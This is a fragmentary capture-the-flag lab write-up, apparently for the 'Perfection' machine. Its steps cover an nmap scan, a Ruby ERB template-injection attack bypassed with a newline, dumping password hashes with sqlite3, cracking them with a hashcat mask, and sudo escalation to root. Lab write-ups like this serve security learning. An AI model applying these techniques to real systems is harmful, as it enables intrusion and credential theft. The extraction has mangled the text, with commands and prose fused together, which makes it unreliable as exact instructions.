Jul 23, 2024
nmap -SC -SV -VV -oA nmap/perfection 10.10.11.253
http://10.10.11.253
or %0A
) which is not checked by regex{}
for payloads, test through Burp Suite7*7
within template #{
ls}
main.rb
for understanding the code and vulnerabilityERB.new
for templates, allowing code executionsqlite3 pupil 'select name, password from users'
first name + reversed first name + integer
)hashcat -a 3 -m 1400 hashes/perfection 'susan_nasus_{integer}'
sudo
accesssudo su
to escalate privilegeswhoami
Summary: Successfully exploited SSTI vulnerability, bypassed filters, gained initial access, extracted and cracked the password, and escalated to root.
Key Learnings: Understanding SSTI, filter bypass techniques, password cracking with complex rules, and efficient use of Hashcat.
Tools Used: Nmap, Burp Suite, SQLite3, Hashcat